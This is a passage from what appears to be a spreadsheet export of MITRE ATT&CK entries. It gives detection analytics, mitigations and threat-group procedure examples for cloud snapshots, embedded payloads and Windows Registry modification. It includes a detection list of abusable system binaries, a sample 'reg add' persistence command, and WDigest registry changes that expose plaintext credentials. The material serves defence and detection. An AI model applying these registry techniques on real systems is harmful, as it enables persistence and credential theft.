[WhisperGate](https://attack.mitre.org/software/S0689)'s downloader can reverse its third stage file bytes and reflectively load the file as a .NET assembly.(Citation: RecordedFuture WhisperGate Jan 2022)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has reflectively loaded a DLL to read, decrypt, and load an orchestrator file.(Citation: SentinelLabs Metador Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Snapshot Creation
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API)
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;sourceSnapshot&lt;/code&gt; parameter pointed to &lt;code&gt;global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)
Snapshot Metadata
Periodically baseline snapshots to identify malicious modifications or additions.
Audit
Routinely check user permissions to ensure only the expected users have the capability to create snapshots and backups.
User Account Management
Limit permissions for creating snapshots or backups in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can create snapshots of EBS volumes and RDS instances.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Instance Deletion
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)
Instance Metadata
Periodically baseline instances to identify malicious modifications or additions.
Audit
Routinely check user permissions to ensure only the expected users have the capability to delete new instances.
User Account Management
Limit permissions for deleting new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files containing large amounts of data. Abnormal file sizes may be an indicator of embedded content.
File Metadata
Monitor contextual data about a file that may highlight embedded payloads, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.  
Antivirus/Antimalware
Anti-virus can be used to automatically detect and quarantine suspicious files.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts.(Citation: win10_asr)
C0021
For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors embedded a base64-encoded payload within a LNK file.(Citation: Microsoft Unidentified Dec 2018)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) has an embedded second stage DLL payload within the first stage of the malware.(Citation: Gigamon BADHATCH Jul 2019)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has embedded a XOR encrypted communications module inside the orchestrator module.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
DEADEYE
The DEADEYE.EMBED variant of [DEADEYE](https://attack.mitre.org/software/S1052) has the ability to embed payloads inside of a compiled binary.(Citation: Mandiant APT41)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) has used a dropper that embeds an encrypted payload as extra data.(Citation: Securelist Dtrack)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has dropped an embedded executable at `%Temp%\setup.exe`.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Invoke-PSImage
[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed payload data within a new image file.(Citation: GitHub PSImage)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457)'s DLL has been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)
SMOKEDHAM
The [SMOKEDHAM](https://attack.mitre.org/software/S0649) source code is embedded in the dropper as an encrypted string.(Citation: FireEye SMOKEDHAM June 2021)
Uroburos
The [Uroburos](https://attack.mitre.org/software/S0022) Queue file contains embedded executable files along with key material, communication channels, and modes of operation.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has embedded [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) within another run-only [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008).(Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Instance Metadata
Periodically baseline instances to identify malicious modifications or additions.
Instance Modification
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Instance Start
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to activation of instances that are occurring outside of normal activity/planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Instance Stop
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to deactivation of instances that are occurring outside of planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
</t>
  </si>
  <si>
    <t>Command Execution
 Monitor executed commands and arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. The Registry may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Network Traffic Flow
Remote access to the registry can be achieved via
- Windows API function RegConnectRegistry
- command line via reg.exe
- graphically via regedit.exe
All of these behaviors call into the Windows API, which uses the NamedPipe WINREG over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function.
&lt;h4&gt;Analytic 1 - Remote Registry&lt;/h4&gt;
&lt;code&gt;flows = search Flow:Message
winreg = filter flows where (dest_port == 445 and proto_info.pipe == "WINREG")
winreg_modify = filter flows where (proto_info.function == "Create*" or proto_info.function == "SetValue*")&lt;/code&gt;
OS API Execution
Monitor for API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016). Other API calls relevant to Registry Modification include &lt;code&gt;RegOpenKeyExA&lt;/code&gt;,&lt;code&gt; RegCreateKeyExA&lt;/code&gt;,&lt;code&gt; RegDeleteKeyExA&lt;/code&gt;,&lt;code&gt; RegDeleteValueExA&lt;/code&gt;,&lt;code&gt; RegEnumKeyExA&lt;/code&gt;,&lt;code&gt; RegEnumValueExA&lt;/code&gt;, among others.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
Process Creation
Monitor processes and command-line arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. (i.e. reg.exe, regedit.exe). The analytic is oriented around detecting invocations of [Reg](https://attack.mitre.org/software/S0075) where the parent executable is an instance of cmd.exe that wasn’t spawned by explorer.exe. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exewill typically be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be baselined so they can be tuned out accordingly. Analytic Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). 
&lt;h4&gt; Analytic 1 - Suspicious Processes &lt;/h4&gt;
&lt;code&gt;reg_processes = filter processes where ( 
  (event_id == "1" OR event_id == "4688") AND (exe == "reg.exe" AND parent_exe == "cmd.exe"))
cmd_processes = filter processes where ( 
  (event_id == "1" OR event_id == "4688") AND (exe == "cmd.exe" AND parent_exe != "explorer.exe""))
reg_and_cmd_processes = join (reg_processes, cmd_processes) where (reg.parent_pid == cmd.pid and reg.hostname == cmd.hostname)&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Rare LolBAS Command Lines &lt;/h4&gt;
&lt;code&gt;lolbas_processes = filter processes where (
exe = "At.exe" OR 
exe = "Atbroker.exe" OR 
exe = "Bash.exe" OR 
exe = "Bitsadmin.exe" OR 
exe = "Certutil.exe" OR 
exe = "Cmd.exe" OR 
exe = "Cmdkey.exe" OR 
exe = "Cmstp.exe" OR 
exe = "Control.exe" OR 
exe = "Csc.exe" OR 
exe = "Cscript.exe" OR 
exe = "Dfsvc.exe" OR 
exe = "Diskshadow.exe" OR 
exe = "Dnscmd.exe" OR 
exe = "Esentutl.exe" OR 
exe = "Eventvwr.exe" OR 
exe = "Expand.exe" OR 
exe = "Extexport.exe" OR 
exe = "Extrac32.exe" OR 
exe = "Findstr.exe" OR 
exe = "Forfiles.exe" OR 
exe = "Ftp.exe" OR 
exe = "Gpscript.exe" OR 
exe = "Hh.exe" OR 
exe = "Ie4uinit.exe" OR 
exe = "Ieexec.exe" OR 
exe = "Infdefaultinstall.exe" OR 
exe = "Installutil.exe" OR 
exe = "Jsc.exe" OR 
exe = "Makecab.exe" OR 
exe = "Mavinject.exe" OR 
exe = "Microsoft.Workflow.r.exe" OR 
exe = "Mmc.exe" OR 
exe = "Msbuild.exe" OR 
exe = "Msconfig.exe" OR 
exe = "Msdt.exe" OR 
exe = "Mshta.exe" OR 
exe = "Msiexec.exe" OR 
exe = "Odbcconf.exe" OR 
exe = "Pcalua.exe" OR 
exe = "Pcwrun.exe" OR 
exe = "Presentationhost.exe" OR
exe = "Print.exe" OR 
exe = "Reg.exe" OR 
exe = "Regasm.exe" OR 
exe = "Regedit.exe" OR 
exe = "Register-cimprovider.exe" OR 
exe = "Regsvcs.exe" OR 
exe = "Regsvr32.exe" OR 
exe = "Replace.exe" OR 
exe = "Rpcping.exe" OR 
exe = "Rundll32.exe" OR 
exe = "Runonce.exe" OR 
exe = "Runscripthelper.exe" OR 
exe = "Sc.exe" OR 
exe = "Schtasks.exe" OR 
exe = "Scriptrunner.exe" OR 
exe = "SyncAppvPublishingServer.exe" OR 
exe = "Tttracer.exe" OR 
exe = "Verclsid.exe" OR 
exe = "Wab.exe" OR 
exe = "Wmic.exe" OR 
exe = "Wscript.exe" OR 
exe = "Wsreset.exe" OR 
exe = "Xwizard.exe" OR 
exe = "Advpack.dll OR 
exe = "Comsvcs.dll OR 
exe = "Ieadvpack.dll OR 
exe = "Ieaframe.dll OR 
exe = "Mshtml.dll OR 
exe = "Pcwutl.dll OR 
exe = "Setupapi.dll OR 
exe = "Shdocvw.dll OR 
exe = "Shell32.dll OR 
exe = "Syssetup.dll OR
exe = "Url.dll OR 
exe = "Zipfldr.dll OR 
exe = "Appvlp.exe" OR 
exe = "Bginfo.exe" OR 
exe = "Cdb.exe" OR 
exe = "csi.exe" OR 
exe = "Devtoolslauncher.exe" OR 
exe = "dnx.exe" OR 
exe = "Dxcap.exe" OR 
exe = "Excel.exe" OR 
exe = "Mftrace.exe" OR 
exe = "Msdeploy.exe" OR 
exe = "msxsl.exe" OR 
exe = "Powerpnt.exe" OR 
exe = "rcsi.exe" OR 
exe = "Sqler.exe" OR 
exe = "Sqlps.exe" OR 
exe = "SQLToolsPS.exe" OR 
exe = "Squirrel.exe" OR 
exe = "te.exe" OR 
exe = "Tracker.exe" OR 
exe = "Update.exe" OR 
exe = "vsjitdebugger.exe" OR 
exe = "Winword.exe" OR 
exe = "Wsl.exe" OR 
exe = "CL_Mutexverifiers.ps1 OR 
exe = "CL_Invocation.ps1 OR 
exe = "Manage-bde.wsf OR 
exe = "Pubprn.vbs OR 
exe = "Slmgr.vbs OR 
exe = "Syncappvpublishingserver.vbs OR 
exe = "winrm.vbs OR 
exe = "Pester.bat)
process_count = count(lolbas_processes) by process
process_count_avg = average(process_count)
process_count_stdev = standard_deviation(process_count)
lower_bound = process_count_avg - stdev * 1.5
outliers = filter lolbas_processes where (process_count &lt; lower_bound) &lt;/code&gt;
Windows Registry Key Creation
Monitor for newly constructed registry keys or values to aid in persistence and execution. Detection of creation of registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode. The key SafeDllSearchMode, if set to 0, will block the Windows mechanism for the search DLL order and adversaries may execute their own malicious dll.
&lt;h4&gt;Analytic 1 - Registry Edit with Creation of SafeDllSearchMode Key Set to 0&lt;/h4&gt;
&lt;code&gt;safe_dll_search_processes = filter processes where command_line CONTAINS("*SafeDllSearchMode*") AND ((command_line CONTAINS("*reg*") AND command_line CONTAINS("*add*") AND command_line CONTAINS("*/d*")) OR (command_line CONTAINS("*Set-ItemProperty*") AND command_line CONTAINS(*-value*)) OR ((command_line CONTAINS("*00000000*") AND command_line CONTAINS(*0*)))
reg_keys = search Registry:value_edit
safe_dll_reg_keys = filter reg_keys where value="SafeDllSearchMode" AND value_data="0"&lt;/code&gt;
Windows Registry Key Deletion
Monitor for unexpected deletion of windows registry keys to hide configuration information, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. 
Windows Registry Key Modification
Monitor for changes made to windows registry keys or values. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Detection of modification of the registry key values of Notify, Userinit, and Shell located in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKEY_LOCAL_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\. When a user logs on, the Registry key values of Notify, Userinit and Shell are used to load dedicated Windows component. Attackers may insert malicious payload following the legitimate value to launch a malicious payload.
Detection of the modification of the registry key Common Startup located in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\ and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys.
&lt;h4&gt;Analytic 1 - Registry Edit with Modification of Userinit, Shell or Notify&lt;/h4&gt;
&lt;code&gt;logon_reg_processes = filter processes where command_line CONTAINS("*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*") AND (command_line CONTAINS("*Userinit*") OR command_line CONTAINS("*Shell*") OR command_line CONTAINS("*Notify*")) AND (((command_line CONTAINS("*reg*") OR command_line CONTAINS("*add*") OR command_line CONTAINS("*/d*")) OR (command_line CONTAINS("*Set-ItemProperty*") OR command_line CONTAINS("*New-ItemProperty*") OR command_line CONTAINS("*-value*"))))
reg_keys = search Registry:value_edit
logon_reg_keys = filter reg_keys where (value="Userinit" OR value="Shell" OR value="Notify")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Modification of Default Startup Folder in the Registry Key ‘Common Startup’&lt;/h4&gt;
&lt;code&gt;logon_reg_processes = filter processes where (command_line CONTAINS("*reg*") AND command_line CONTAINS("*add*") AND command_line CONTAINS("*/d*") OR (command_line CONTAINS("*Set-ItemProperty*") AND command_line CONTAINS("*-value*")) AND command_line CONTAINS("*Common Startup*"))
reg_keys = search Registry:value_edit
logon_reg_keys = filter reg_keys where value="Common Startup"&lt;/code&gt;
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. (Citation: Booz Allen Hamilton).
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and manipulate the Registry.(Citation: McAfee Night Dragon)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that modified registry keys.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled).(Citation: FoxIT Wocao December 2019)
APT19
[APT19](https://attack.mitre.org/groups/G0073) uses a Port 22 malware variant to modify several Registry keys.(Citation: Unit 42 C0d0so0 Jan 2016)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has modified the Windows Registry to store the backdoor's configuration. (Citation: ESET OceanLotus Mar 2019)	
APT38
[APT38](https://attack.mitre.org/groups/G0082) uses a tool called CLEANTOAD that has the capability to modify Registry keys.(Citation: FireEye APT38 Oct 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Registry modifications to specify a DLL payload.(Citation: RedCanary Mockingbird May 2020)	
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to perform multiple techniques through the use of [Reg](https://attack.mitre.org/software/S0075).(Citation: US-CERT TA18-074A)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command &lt;code&gt;reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used an open source batch script to modify Windows Defender registry keys.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has deleted Registry keys during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has removed security settings for VBA macro execution by changing registry values &lt;code&gt;HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\VBAWarnings&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\AccessVBOM&lt;/code&gt;.(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under &lt;code&gt;HKCU\Software\Microsoft\Office\&lt;/code&gt;.(Citation: Unit 42 Gorgon Group Aug 2018)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has modified Registry settings for default file associations to enable all macros and for persistence.(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that adds Registry keys for persistence.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has modified Registry settings for security tools.(Citation: DFIR Report APT35 ProxyShell March 2022)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.(Citation: TrendMicro Patchwork Dec 2017)
Silence
[Silence](https://attack.mitre.org/groups/G0091) can create, delete, or modify a specified Registry key or value.(Citation: Group IB Silence Sept 2018)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used malware to disable Windows Defender through modification of the Registry.(Citation: Korean FSI TA505 2020)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro Iron Tiger April 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has modify Registry values to store payloads.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key &lt;code&gt;HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest&lt;/code&gt; by setting the &lt;code&gt;UseLogonCredential&lt;/code&gt; registry value to &lt;code&gt;1&lt;/code&gt; in order to force credentials to be stored in clear text in memory. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also modified the WDigest registry key to allow plaintext credentials to be cached in memory.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can modify registry keys as part of setting a new pass-through authentication agent.(Citation: AADInternals Documentation)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of setting and deleting Registry values.(Citation: Bitdefender APT28 Dec 2015)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can achieve persistence by modifying Registry key entries.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has overwritten registry keys for persistence.(Citation: BlackBerry Amadey 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) modifies several registry keys for persistence and UAC bypass.(Citation: Arxiv Avaddon Feb 2021)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of deleting Registry keys, sub-keys, and values on a victim system.(Citation: FireEye APT30)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) modifies the firewall Registry key &lt;code&gt;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List&lt;/code&gt;.(Citation: US-CERT BADCALL)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) writes data into the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj&lt;/code&gt;.(Citation: US-CERT Bankshot Dec 2017)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has deleted Registry keys to clean up its prior activity.(Citation: Talos Bisonal Mar 2020) 
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can set values in the Registry to help in execution.(Citation: Crowdstrike Indrik November 2018) 
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can modify the Registry to enable itself to run in safe mode and to modify the icons and file extensions for encrypted files.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Trend Micro Black Basta May 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Palo Alto Networks Black Basta August 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters`(Citation: Microsoft BlackCat Jun 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) may modify Registry keys to store RC4 encrypted configuration information.(Citation: FireEye APT28)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can write to the Registry under the &lt;code&gt;%windir%&lt;/code&gt; variable to execute tasks.(Citation: Cybereason Kimsuky November 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) sets &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) creates three Registry keys to establish persistence by adding a [Windows Service](https://attack.mitre.org/techniques/T1543/003).(Citation: Symantec Catchamas April 2018)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a command to modify a Registry key.(Citation: ClearSky Lebanese Cedar Jan 2021)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) can modify Registry values to stored information and establish persistence.(Citation: Cybereason Chaes Nov 2020) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can remove persistence-related artifacts from the Registry.(Citation: Check Point APT35 CharmPower January 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can set and delete Registry keys.(Citation: Trend Micro DRBControl February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) can make modifications to Registry keys.(Citation: Cybereason Clop Dec 2020) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can modify Registry values within &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt; to enable the execution of additional code.(Citation: Talos Cobalt Strike September 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has modified Registry values to store encrypted orchestrator code and payloads.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
Conficker
[Conficker](https://attack.mitre.org/software/S0608) adds keys to the Registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt; and various other Registry locations.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can set a Registry key to determine how long it has been installed and possibly to indicate the version number.(Citation: Proofpoint Operation Transparent Tribe March 2016)
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has created Registry keys for persistence.(Citation: Checkpoint MosesStaff Nov 2021)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) adds a Registry value for its installation routine to the Registry Key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”&lt;/code&gt; and &lt;code&gt;HKEY_CURRENT_USER\Software\DC3_FEXEC&lt;/code&gt;.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has modified registry keys for persistence.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can modify Registry values to store configuration strings, keylogger, and output of components.(Citation: Prevailion DarkWatchman 2021)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can make modifications to the Regsitry for persistence.(Citation: Prevailion EvilNum May 2020)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) adds the configuration to the Registry in XML format.(Citation: ESET TeleBots Oct 2018)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has a function to write itself to Registry values.(Citation: CheckPoint Volatile Cedar March 2015) 
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the Registry key &lt;code&gt;HKCU\Software\Classes\Applications\rundll32.exe\shell\open&lt;/code&gt;.(Citation: FireEye FELIXROOT July 2018)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.(Citation: Kaspersky WIRTE November 2021)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can modify the Registry to store its components.(Citation: ESET Gelsemium June 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) modifies conditions in the Registry and adds keys.(Citation: ESET GreyEnergy Oct 2018)
HOPLIGHT
